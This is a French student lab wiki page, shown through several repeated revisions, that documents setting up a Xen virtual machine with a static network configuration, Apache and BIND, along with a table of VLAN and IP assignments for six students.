L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
<b> Installation du serveur HTTP </b><br />
<pre> apt-get install apache2 </pre><br />
<b> Installation du serveur DNS </b><br />
<pre> apt-get install bind9 </pre><br />
<br />
Si cette installation vous indique une erreur, il faut modifier le fichier <i>/etc/apt/apt.conf.d/01proxy</i><br />
et remplacer <br />
<pre> Acquire::http::Proxy "http://proxy.polytech-lille.fr:3128"; </pre><br />
par<br />
<pre> Acquire::http::Proxy "http://helfaut.escaut.net:3128"; </pre><br />
Cette modification est du a la modification du proxy de l'école.<br />
<br />
<b>Configuration de notre nom de domaine</b><br />
Après l'achat de notre nom de domaine <i>orelsan.website</i></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35628TP sysres IMA2a5 2016/2017 G42016-12-05T15:25:13Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<br />
<b> Installation du serveur HTTP </b><br />
<pre> apt-get install apache2 </pre><br />
<b> Installation du serveur DNS </b><br />
<pre> apt-get install bind9 </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35627TP sysres IMA2a5 2016/2017 G42016-12-05T15:24:35Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre><br />
<br />
<br />
== Configuration du service internet ==<br />
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP<br />
<b> Installation du serveur HTTP </b><br />
<pre> apt-get install apache2 </pre><br />
<b> Installation du serveur DNS </b><br />
<pre> apt-get install bind9 </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35626TP sysres IMA2a5 2016/2017 G42016-12-05T15:16:13Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre><br />
<br />
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :<br />
<pre> apt-get install vim </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35625TP sysres IMA2a5 2016/2017 G42016-12-05T15:14:06Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier <i>orelsan.cfg</i> en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier <i>interfaces</i> pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35624TP sysres IMA2a5 2016/2017 G42016-12-05T15:12:16Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier "orelsan.cfg" en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre><br />
<br />
Une fois la connexion sur notre machine établie, nous devons changer le fichier interfaces pour permettre une connexion à internet:<br />
<pre># The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gateway 193.48.57.190</pre><br />
<br />
Puis pour prendre en compte ses modifications nous utilisons :<br />
<pre>ifdown<br />
ifup</pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35623TP sysres IMA2a5 2016/2017 G42016-12-05T14:53:40Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier "orelsan.cfg" en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre><br />
<br />
Lancement de notre machine virtuelle <br />
<pre> xl create Orelsan.cvg </pre><br />
<br />
Connection à notre machine virtuelle<br />
<pre> xl console Orelsan </pre><br />
<br />
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :<br />
<pre> xl list </pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35622TP sysres IMA2a5 2016/2017 G42016-12-05T14:47:01Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier "orelsan.cfg" en remplaçant la version 3.14 en 3.16.0 <br />
<pre>kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35621TP sysres IMA2a5 2016/2017 G42016-12-05T14:46:48Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre><br />
<br />
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier "orelsan.cfg" en remplaçant la version 3.14 en 3.16.0 <br />
<pre> kernel = '/boot/vmlinuz-3.16.0-4-amd64'<br />
extra = 'elevator=noop'<br />
ramdisk = '/boot/initrd.img-3.16.0-4-amd64'</pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35620TP sysres IMA2a5 2016/2017 G42016-12-05T14:43:11Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==<br />
<br />
== Installation d'une machine virtuelle ==<br />
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.<br />
Pour créer la machine virtuel, on tape la commande suivante :<br />
<pre> xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen</pre></div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35583TP sysres IMA2a5 2016/2017 G42016-12-02T09:06:22Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==</div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35581TP sysres IMA2a5 2016/2017 G42016-12-02T09:01:07Z<p>Jturut : </p>
<hr />
<div>{| class="wikitable centre" width="100%"<br />
|+ Tableau<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| Gringe<br />
| 193.48.57.180/28<br />
|-<br />
| VLAN25 <br />
| Joan <br />
| 10.60.25.0/24 <br />
| Orelsan<br />
| 193.48.57.181/28<br />
|}<br />
<br />
== Configuration du point d'accés Cisco ==</div>Jturuthttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&diff=35580TP sysres IMA2a5 2016/2017 G42016-12-02T09:00:11Z<p>Jturut : Page créée avec « {| class="wikitable centre" width="100%" |+ Tableau |- ! scope=col | N° VLAN ! scope=col | Prénom ! scope=col | Réseau local ! scope=col | @IP réel routeur ! scope=col |... »</p>
<hr />
<div><br />
{| class="wikitable centre" width="100%"<br />
|+ Tableau<br />
|-<br />
! scope=col | N° VLAN<br />
! scope=col | Prénom<br />
! scope=col | Réseau local<br />
! scope=col | @IP réel routeur<br />
! scope=col | @IP virtuelle routeur<br />
! scope=col | Nom VM<br />
! scope=col | @IP VM <br />
|-<br />
| VLAN20 <br />
| Dimitri <br />
| 10.60.20.0/24<br />
| 10.60.20.2/24<br />
| 10.60.20.3/24<br />
| Vald<br />
|193.48.57.182/28<br />
|-<br />
|VLAN21 <br />
| Nabil <br />
| 10.60.21.0/24<br />
| 10.60.21.2/24<br />
| 10.60.21.3/24<br />
| Pnl<br />
|193.48.57.177/28<br />
|-<br />
| VLAN22<br />
| Otmane <br />
| 10.60.22.0/24<br />
| 10.60.22.2/24<br />
| 10.60.22.3/24 <br />
| Lartiste<br />
| 193.48.57.178/28<br />
|-<br />
| VLAN23 <br />
| Hugo <br />
| 10.60.23.0/24 <br />
| 10.60.23.2/24<br />
| 10.60.23.3/24 <br />
| Gradur<br />
| 193.48.57.179/28<br />
|-<br />
| VLAN24 <br />
| Clement <br />
| 10.60.24.0/24 <br />
| 10.60.24.2/24<br />
| 10.60.24.3/24 <br />
| Gringe<br />
